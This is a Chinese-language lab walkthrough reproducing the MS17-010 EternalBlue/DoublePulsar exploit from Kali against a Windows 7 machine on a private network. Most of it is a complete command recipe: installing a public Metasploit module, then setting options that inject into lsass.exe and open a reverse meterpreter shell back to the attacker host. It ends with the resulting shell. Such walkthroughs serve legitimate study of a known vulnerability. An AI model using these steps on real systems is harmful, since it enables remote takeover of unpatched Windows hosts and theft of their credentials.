方程式-ms17-010复现

0x01 环境介绍:

目标机win7 x86: 192.168.1.120

控制机Kail: 192.168.1.99

0x02 环境准备

利用模块：https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
wine可以在linux下运行windows程序

1 2	apt-get install wine wine cmd.exe 打开cmd.exe,exit退出

将链接的文件克隆到kali中，并将eternalblue_doublepulsar.rb移动至metasploit的exploit/windows/smb文件夹中,具体路径为/usr/share/metasploit-framework/modules/exploits/windows/smb

1
2

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
cp Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

0x03 利用过程

设置参数，按照实际情况设置，DOUBLEPULSARPATH和ETERNALBLUEPATH指向从github下载的deps文件夹即可，里面包含了DOUBLEPULSAR和ETERNALBLUE所需的dll
设置一个payload
注意：如果靶机为64位，改为set payload windows/x64/meterpreter/reverse_tcp

然后打开msfconsole


use exploit/windows/smb/eternalblue_doublepulsar
#set   DOUBLEPULSARPATH  /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
#set  ETERNALBLUEPATH   /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set processinject lsass.exe
#set TARGETARCHITECTURE  x64
set rhost 192.168.1.120
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.99
show targets 
set target 9
options 
run

最后在msf下可以看到成功反弹shell:

1 2	meterpreter>sysinfo meterpreter>shell

ref
smb(ms17-010)远程命令执行之msf
ms17-010
方程式利用-不需Fuzzbunch完美入侵windows
方程式ETERNALBLUE 之fb.py的复现